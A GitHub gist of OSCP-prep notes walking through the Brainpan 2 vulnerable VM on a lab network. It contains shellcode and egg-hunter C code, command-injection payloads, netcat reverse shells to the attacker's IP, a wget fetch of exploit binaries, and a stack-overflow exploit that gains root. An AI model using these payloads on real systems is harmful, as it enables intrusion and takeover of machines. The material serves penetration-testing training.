Skip to content

Instantly share code, notes, and snippets.

@SecurityIsIllusion

SecurityIsIllusion/OSCP Preparation

Created July 22, 2017 14:03
Show Gist options
  • Save SecurityIsIllusion/fbbefe1a78d79c4088fb17426ab940d9 to your computer and use it in GitHub Desktop.
Save SecurityIsIllusion/fbbefe1a78d79c4088fb17426ab940d9 to your computer and use it in GitHub Desktop.
Download ZIP
BrainPan2 Walkthrough 22 June 2017
Raw
eggcode.c
/* eggcode.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"
"\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
int main(void)
{
char shell[512];
puts("Eggshell loaded into environment.\n");
memset(shell,NOP,512); /* fill-up the buffer with NOP */
/* fill-up the shellcode on the second half to the end of buffer */
memcpy(&shell[512-strlen(shellcode)],shellcode,strlen(shellcode));
/* set the environment variable to */
/* EGG and shell as its value, rewrite if needed */
setenv("EGG", shell, 1);
/* modify the variable */
putenv(shell);
/* invoke the bash */
system("bash");
return 0;
}
Raw
findeggadd.c
/* findeggadd.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
int main(void)
{
printf("EGG address: 0x%lx\n", getenv("EGG"));
return 0;
}
Raw
gistfile1.txt
/* update.c */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setreuid(1001,1001);
system("/bin/sh");
return 0;
}
Raw
OSCP Preparation
netdiscover -r 192.168.43.0/24
nmap 192.168.43.132
PORT STATE SERVICE
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
MAC Address: 08:00:27:13:36:8F (Oracle VirtualBox virtual NIC)
nmap 192.168.43.132 -A -Pn
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [______________________ WELCOME TO BRAINPAN 2.0________________________]
|_ LOGIN AS GUEST
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Hacking Trends
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.50%I=7%D=7/16%Time=596B9A6A%P=i686-pc-linux-gnu%r(NULL
SF:,296,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[______________________\x20WELCOME\x20TO\x20BRAINPAN\x202\
SF:.0________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20LOGIN\x20AS\x20GUEST\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 08:00:27:13:36:8F (Oracle VirtualBox virtual NIC)
http://192.168.43.132:10000/
nikto -h 192.168.43.132:10000
http://192.168.43.132:10000
dirbuster
http://192.168.43.132:10000
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dirb http://192.168.43.132:10000 /usr/share/wordlists/dirb/big.txt
http://192.168.43.132:10000/bin
copy barinpan.exe to windows and analyze for buffer overflow
file brainpan.exe
brainpan.exe: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85", baseline, precision 8, 381x307, frames 3
(trolled)
telnet 192.168.43.132 9999
nc 192.168.43.132 9999
GUEST
TELL ME MORE
FILES
VIEW
notes.txt
ENTER FILE TO DOWNLOAD: notes.txt
TODO LIST
---------
reynard:
- Completed manpage. Read with groff or man.
- Renamed to brainpan.txt instead of brainpan.7.
- Fixed call to read manpage: popen("man ./brainpan.txt", "r");
puck:
Easiest way to display file contents is to just use popen(). Eg:
popen("/bin/ls", "r");
popen("/bin/man ./brainpan.7", "r");
popen("/usr/bin/top", "r");
etc...
anansi:
- Fixed a reported buffer overflow in login in version 1.0.
- Discovered buffer overflow in the command prompt, fixed as of version 2.0
puck: look into loading a configuration file instead of hardcoding settings
in the server, version 1.8
anansi: dropped configuration file - leave it hardcoded, version 1.9
VIEW
brainpan.txt
nc -lvp 5555
VIEW
ENTER FILE TO DOWNLOAD: ; ls
brainpan.exe
brainpan.txt
notes.txt
test-1
test-2
Command Injection in VIEW
root@kali:~# locate /bin/nc
/bin/nc
/bin/nc.traditional
/usr/bin/ncal
/usr/bin/ncat
/usr/bin/ncrack
ENTER FILE TO DOWNLOAD: /etc/passwd; whoami
root:x:104:106:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
root :x:0:0:root:/var/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
anansi:x:1000:1000:anansi,,,:/home/anansi:/bin/bash
puck:x:1001:1001:puck,,,:/home/puck:/bin/bash
reynard:x:1002:1002:reynard,,,:/home/reynard:/bin/bash
anansi
/etc/passwd | whoami
anansi
; /bin/nc.traditional -e /bin/sh 192.168.43.251 5555
nc -lvp 5555
listening on [any] 5555 ...
connect to [192.168.43.251] from brainpan2 [192.168.43.132] 60724
python -c 'import pty; pty.spawn("/bin/sh")'
$ pwd
pwd
/opt/brainpan
ls -alh
-rwxr-xr-x 1 root root 18K Nov 4 2013 brainpan.exe
-rw-r--r-- 1 root root 1.1K Nov 5 2013 brainpan.txt
-rw-r--r-- 1 root root 683 Nov 4 2013 notes.txt
-rw-r--r-- 1 anansi anansi 12 Nov 5 2013 test-1
-rwxrwxrwx 1 anansi anansi 19 Nov 5 2013 test-2
file brainpan.exe
brainpan.exe: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x56a8616e6cab65be431cfe17957d989dee8f9d93, not stripped
cd /home
ls
cd reynard
ls
./msg_root test test
reverse engineer msg_root
gdb msg_root
run aaaaaaaaaaaaaabbbb test
i registers
i registers
eax 0x62626262 1650614882
ecx 0x0 0
edx 0xbfffff5f -1073741985
ebx 0xb7fd6ff4 -1208127500
esp 0xbffffd54 0xbffffd54
ebp 0xbffffd78 0xbffffd78
esi 0x0 0
edi 0x0 0
eip 0x62626262 0x62626262
eflags 0x10286 [ PF SF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
bt (backtrace) call stack
bt
#0 0x62626262 in ?? ()
#1 0x0804872e in get_name (
u=0xbfffff38 'a' <repeats 14 times>, "bbbb", 'c' <repeats 16 times>,
m=0xbfffff5b "test") at msg_root.c:26
#2 0x0804877b in main (argc=3, argv=0xbffffe24) at msg_root.c:35
x/200x $esp
If we search the stack some using the GDB command x/200x $esp to search 200 words from the top of the stack we will find our Cs.
0xbffffef4: 0x5f67736d 0x746f6f72 0x61616100 0x61616161
0xbfffff04: 0x61616161 0x62616161 0x63626262 0x63636363
0xbfffff14: 0x63636363 0x63636363 0x63636363 0x63636363
0xbfffff24: 0x63636363 0x63636363 0x63636363 0x63636363
0xbfffff34: 0x63636363 0x63636363 0x63636363 0x63636363
0xbfffff44: 0x63636363 0x63636363 0x63636363 0x63636363
0xbfffff54: 0x63636363 0x65740063 0x53007473 0x4c564c48
export TERM=xterm
clear
C-code for egg hunting
eggcode.c
findeggaddr.c
host them in apache adb download via wget
cd /tmp
wget http://192.168.43.251/eggcode
wget http://192.168.43.251/findeggadd
run the exploit
chmod 777 eggcode
chmod 777 findeggadd
./eggcode
./findeggadd
EGG address: 0xbffffd75
./msg_root $(python -c 'print "A" * 14 + "\x75\xfd\xff\xbf"') B
id
id
uid=1000(anansi) gid=1000(anansi) euid=104(root) groups=106(root),50(staff),1000(anansi)
uid and euid should be same
we can do so by writing a C program
cd /root
cd /root
$ pwd
pwd
/root
$ ls
ls
flag.txt whatif.txt
$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
$ cat whatif.txt
cat whatif.txt
WHAT IF I TOLD YOU
___
/ \
| ______\
(, \_/ \_/
| ._. |
\ --- /
/`-.__.'
.---'`-.___|\___
/ `.
YOU ARE NOT ROOT?
$ cat /etc/passwd
cat /etc/passwd
root:x:104:106:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
root :x:0:0:root:/var/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
anansi:x:1000:1000:anansi,,,:/home/anansi:/bin/bash
puck:x:1001:1001:puck,,,:/home/puck:/bin/bash
reynard:x:1002:1002:reynard,,,:/home/reynard:/bin/bash
$ whoami
whoami
root
$ id
id
uid=1000(anansi) gid=1000(anansi) euid=104(root) groups=106(root),50(staff),1000(anansi)
compile and download by wget
search for another executable and we got brainpan-1.8 in /opt
file brainpan-1.8.exe
cat brainpan.cfg
port=9333
ipaddr=127.0.0.1
echo "port=7777" > brainpan.cfg
echo "ipaddr=192.168.43.251" >> brainpan.cfg
./brainpan-1.8.exe
nc 192.168.43.132 7777
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[______________________ WELCOME TO BRAINPAN 1.8________________________]
LOGIN AS GUEST
>> GUEST
ACCESS GRANTED
* * * *
THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED.
TYPE "TELL ME MORE" FOR A LIST OF COMMANDS.
* * * *
>> VIEW
ENTER FILE TO DOWNLOAD: a; ls
brainpan-1.8.exe
brainpan.7
brainpan.cfg
>> VIEW
ENTER FILE TO DOWNLOAD: /et/passwd
>> ;
WHAT?
>> VIEW
ENTER FILE TO DOWNLOAD: /etc/passwd
root:x:104:106:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
root :x:0:0:root:/var/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
anansi:x:1000:1000:anansi,,,:/home/anansi:/bin/bash
puck:x:1001:1001:puck,,,:/home/puck:/bin/bash
reynard:x:1002:1002:reynard,,,:/home/reynard:/bin/bash
>> VIEW
ENTER FILE TO DOWNLOAD: /etc/passwd | whoami
puck
>> VIEW
ENTER FILE TO DOWNLOAD: /etc/passwd | locate ssh
/etc/ssh
/etc/default/ssh
/etc/init.d/ssh
/etc/network/if-up.d/openssh-server
/etc/pam.d/sshd
/etc/rc2.d/S17ssh
/etc/rc3.d/S17ssh
/etc/rc4.d/S17ssh
/etc/rc5.d/S17ssh
/etc/ssh/moduli
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_ecdsa_key
/etc/ssh/ssh_host_ecdsa_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/sshd_config
/etc/ufw/applications.d/openssh-server
/home/anansi/.ssh
/usr/bin/ssh
/usr/bin/ssh-add
/usr/bin/ssh-agent
/usr/bin/ssh-argv0
/usr/bin/ssh-copy-id
/usr/bin/ssh-keygen
/usr/bin/ssh-keyscan
/usr/bin/ssh-vulnkey
/usr/lib/openssh
/usr/lib/apt/methods/ssh
/usr/lib/openssh/sftp-server
/usr/lib/openssh/ssh-keysign
/usr/lib/openssh/ssh-pkcs11-helper
/usr/sbin/sshd
/usr/share/ssh
/usr/share/bash-completion/completions/autossh
/usr/share/bash-completion/completions/ssh
/usr/share/bash-completion/completions/ssh-add
/usr/share/bash-completion/completions/ssh-copy-id
/usr/share/bash-completion/completions/sshfs
/usr/share/bash-completion/completions/sshmitm
/usr/share/bash-completion/completions/sshow
/usr/share/doc/openssh-blacklist
/usr/share/doc/openssh-blacklist-extra
/usr/share/doc/openssh-client
/usr/share/doc/openssh-server
/usr/share/doc/task-ssh-server
/usr/share/doc/openssh-blacklist/README.Debian
/usr/share/doc/openssh-blacklist/changelog.gz
/usr/share/doc/openssh-blacklist/copyright
/usr/share/doc/openssh-blacklist-extra/changelog.gz
/usr/share/doc/openssh-blacklist-extra/copyright
/usr/share/doc/openssh-blacklist-extra/examples
/usr/share/doc/openssh-blacklist-extra/examples/generate-blacklist.sh
/usr/share/doc/openssh-client/ChangeLog.gssapi
/usr/share/doc/openssh-client/NEWS.Debian.gz
/usr/share/doc/openssh-client/OVERVIEW.gz
/usr/share/doc/openssh-client/README
/usr/share/doc/openssh-client/README.Debian.gz
/usr/share/doc/openssh-client/README.compromised-keys.gz
/usr/share/doc/openssh-client/README.dns
/usr/share/doc/openssh-client/README.tun.gz
/usr/share/doc/openssh-client/changelog.Debian.gz
/usr/share/doc/openssh-client/changelog.gz
/usr/share/doc/openssh-client/copyright
/usr/share/doc/openssh-client/examples
/usr/share/doc/openssh-client/faq.html
/usr/share/doc/openssh-client/examples/sshd_config
/usr/share/lintian/overrides/openssh-client
/usr/share/lintian/overrides/openssh-server
/usr/share/man/man1/ssh-add.1.gz
/usr/share/man/man1/ssh-agent.1.gz
/usr/share/man/man1/ssh-argv0.1.gz
/usr/share/man/man1/ssh-copy-id.1.gz
/usr/share/man/man1/ssh-keygen.1.gz
/usr/share/man/man1/ssh-keyscan.1.gz
/usr/share/man/man1/ssh-vulnkey.1.gz
/usr/share/man/man1/ssh.1.gz
/usr/share/man/man5/ssh_config.5.gz
/usr/share/man/man5/sshd_config.5.gz
/usr/share/man/man8/ssh-keysign.8.gz
/usr/share/man/man8/ssh-pkcs11-helper.8.gz
/usr/share/man/man8/sshd.8.gz
/usr/share/ssh/blacklist.DSA-1024
/usr/share/ssh/blacklist.DSA-2048
/usr/share/ssh/blacklist.RSA-1024
/usr/share/ssh/blacklist.RSA-2048
/usr/share/ssh/blacklist.RSA-4096
/var/lib/dpkg/info/openssh-blacklist-extra.list
/var/lib/dpkg/info/openssh-blacklist-extra.md5sums
/var/lib/dpkg/info/openssh-blacklist-extra.preinst
/var/lib/dpkg/info/openssh-blacklist.list
/var/lib/dpkg/info/openssh-blacklist.md5sums
/var/lib/dpkg/info/openssh-blacklist.preinst
/var/lib/dpkg/info/openssh-client.conffiles
/var/lib/dpkg/info/openssh-client.config
/var/lib/dpkg/info/openssh-client.list
/var/lib/dpkg/info/openssh-client.md5sums
/var/lib/dpkg/info/openssh-client.postinst
/var/lib/dpkg/info/openssh-client.postrm
/var/lib/dpkg/info/openssh-client.preinst
/var/lib/dpkg/info/openssh-client.prerm
/var/lib/dpkg/info/openssh-server.conffiles
/var/lib/dpkg/info/openssh-server.config
/var/lib/dpkg/info/openssh-server.list
/var/lib/dpkg/info/openssh-server.md5sums
/var/lib/dpkg/info/openssh-server.postinst
/var/lib/dpkg/info/openssh-server.postrm
/var/lib/dpkg/info/openssh-server.preinst
/var/lib/dpkg/info/openssh-server.prerm
/var/lib/dpkg/info/openssh-server.templates
/var/lib/dpkg/info/task-ssh-server.list
/var/lib/dpkg/info/task-ssh-server.md5sums
>> VIEW
ENTER FILE TO DOWNLOAD: /etc/passwd | nc -e /bin/sh 192.168.43.251 8888
nc -lvp 8888
listening on [any] 8888 ...
connect to [192.168.43.251] from brainpan2 [192.168.43.132] 54735
id
uid=1000(anansi) gid=1000(anansi) euid=1001(puck) groups=1001(puck),50(staff),1000(anansi)
whoami
puck
python -c 'import pty; pty.spawn("/bin/sh")'
$ pwd
pwd
/opt/old/brainpan-1.8
$ ls
ls
brainpan-1.8.exe brainpan.7 brainpan.cfg
$ cd /home
cd /home
$ ls
ls
anansi puck reynard
$ cd puck
cd puck
$ ls
ls
$ ls -alh
ls -alh
total 28K
drwx------ 4 puck puck 4.0K Nov 5 2013 .
drwxr-xr-x 5 root root 4.0K Nov 4 2013 ..
drwxr-xr-x 3 puck puck 4.0K Nov 5 2013 .backup
-rw------- 1 puck puck 0 Nov 5 2013 .bash_history
-rw-r--r-- 1 puck puck 220 Nov 4 2013 .bash_logout
-rw-r--r-- 1 puck puck 3.4K Nov 4 2013 .bashrc
-rw-r--r-- 1 puck puck 675 Nov 4 2013 .profile
drwx------ 2 puck puck 4.0K Nov 5 2013 .ssh
$ cd .backup
cd .backup
$ ls
ls
$ ls -alh
ls -alh
total 28K
drwxr-xr-x 3 puck puck 4.0K Nov 5 2013 .
drwx------ 4 puck puck 4.0K Nov 5 2013 ..
-rw------- 1 puck puck 395 Nov 5 2013 .bash_history
-rw-r--r-- 1 puck puck 220 Nov 4 2013 .bash_logout
-rw-r--r-- 1 puck puck 3.4K Nov 4 2013 .bashrc
-rw-r--r-- 1 puck puck 675 Nov 4 2013 .profile
drwx------ 2 puck puck 4.0K Nov 4 2013 .ssh
mv .ssh .ssh-old
mv .ssh .ssh-old
$ cp -rp .backup/.ssh .
cp -rp .backup/.ssh .
$ ls -la
ls -la
total 40
drwx------ 5 puck puck 4096 Jul 21 17:34 .
drwxr-xr-x 5 root root 4096 Nov 4 2013 ..
drwxr-xr-x 3 puck puck 4096 Nov 5 2013 .backup
-rw------- 1 puck puck 0 Nov 5 2013 .bash_history
-rw-r--r-- 1 puck puck 220 Nov 4 2013 .bash_logout
-rw-r--r-- 1 puck puck 3392 Nov 4 2013 .bashrc
-rw-r--r-- 1 puck puck 675 Nov 4 2013 .profile
drwx------ 2 puck anansi 4096 Nov 4 2013 .ssh
drwx------ 2 puck anansi 4096 Jul 21 17:12 .ssh-old
-rwxrwxrwx 1 puck anansi 7456 Jul 21 11:40 update
$ ssh -l "root " brainpan2 -p 2222
ssh -l "root " brainpan2 -p 2222
The authenticity of host '[brainpan2]:2222 ([127.0.1.1]:2222)' can't be established.
ECDSA key fingerprint is 0a:15:1c:1c:25:b0:fe:54:8a:35:45:e5:b8:02:97:1a.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '[brainpan2]:2222' (ECDSA) to the list of known hosts.
Linux brainpan2 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov 7 11:00:06 2013
root @brainpan2:~# id
id
uid=0(root ) gid=0(root ) groups=0(root )
root @brainpan2:~# ls -al
ls -al
total 12
drwx------ 3 root root 4096 Nov 4 2013 .
drwxr-xr-x 12 root root 4096 Nov 4 2013 ..
-rw------- 1 root root 0 Nov 7 2013 .bash_history
drwx------ 2 root root 4096 Nov 4 2013 .ssh
root @brainpan2:~# cd /root
cd /root
root @brainpan2:/root# ls
ls
flag.txt whatif.txt
root @brainpan2:/root# cat flag.txt
cat flag.txt
!!! CONGRATULATIONS !!!
You've completed the Brainpan 2 challenge!
Or have you...?
Yes, you have! Pat yourself on the back. :-)
Questions, comments, suggestions for new VM
challenges? Let me know!
Twitter: @superkojiman
Email : [email protected]
Web : http://www.techorganic.com
root @brainpan2:/root#
Raw
shell with payload
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
`python -c 'shell = "\x90" * 20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; print "A" * 14 + "\x5f\xf8\xff\xbf" + shell + "\x90" * 50'`
0xbffff85f
`python -c 'shell = "\x90" * 20 +
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"; print "A" * 14 + "\x14\xF3\xFF\xBF" + " " + shell + "\x90" * (1000 - len(shell))'` test
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment